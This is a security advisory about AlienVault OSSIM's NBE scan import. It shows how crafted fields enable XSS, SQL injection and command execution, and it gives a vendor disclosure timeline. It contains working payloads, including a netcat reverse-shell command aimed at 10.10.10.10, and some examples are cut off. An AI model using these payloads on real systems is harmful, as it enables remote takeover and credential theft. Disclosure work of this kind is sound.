Alienvault OSSIM is an open source SIEM solution designed to collect and correlate log data. The vulnerability management section of the UI allows a user to upload a Nessus scan in NBE format. Using a specially crafted NBE file, a user can exploit multiple vulnerabilities such as XSS, SQLi, and Command Execution. Authentication is required to exploit this vulnerability, but admin privileges are not required. Any user with access to the Vulnerabilities page can perform these attacks.
* Tested on 4.14, 4.15, and 5.0. It likely affects all previous versions as well.
* upcoming version 5.0.2 release
Various fields within the NBE file can be manipulated to exploit certain vulnerabilities. A pretty bare template that I used to test these issues looked something like this:
timestamps|||scan_start|Thu Dec 11 17:00:51 2014|
timestamps||184.108.40.206|host_start|Thu Dec 11 17:00:52 2014|
results|220.127.116.11|18.104.22.168|cifs (445/tcp)|1234|Security Hole|Synopsis
:\n\nThe remote host contains a web browser that is affected by
multiple vulnerabilities.\nOther references :
timestamps||22.214.171.124|host_end|Thu Dec 11 17:11:58 2014|
timestamps|||scan_end|Thu Dec 11 17:16:44 2014|
The hostname/IP portion of the NBE import is vulnerable. Putting <script>alert(0)</script> directly after the hostname/IP in the NBE
The plugin ID portion of the NBE is vulnerable.
Adding to the plugin ID in the
NBE will result in the script being executed every time someone views
the HTML report in the OSSIM interface.
Blind SQL Injection
The plugin ID is also vulnerable to blind SQLi. Adding ' UNION SELECT
SLEEP(20) AND '1'='1 to the plugin ID will cause the DB to sleep for
The protocol portion of the NBE is vulnerable to SQL injection.
And turn it to this:
That will result in the hash of the admin password being included in
the report. The extra '(' in '1(' is required for the ending ) in
order to not cause an error in the Perl script that runs the import.
The hostname/IP portion of the NBE is vulnerable. Adding '#&&nc -c
/bin/sh 10.10.10.10 4444&&' will result in a reverse shell as www-data
The initial # is required to comment out the remainder of a SQL query
that comes before the dig command where this is injected. Without it
the script won't proceed to the required point.
01/12/2015 - Notified the vendor of the vulnerabilities.
01/12/2015 - Vendor confirms the issue and files a defect.
01/28/2015 - Requested an update from the vendor and was told the
issue would be worked on in the future.
04/20/2015 - Requested an update and informed the vendor of my intent
to release the details. No response.
05/05/2015 - Released details to FD.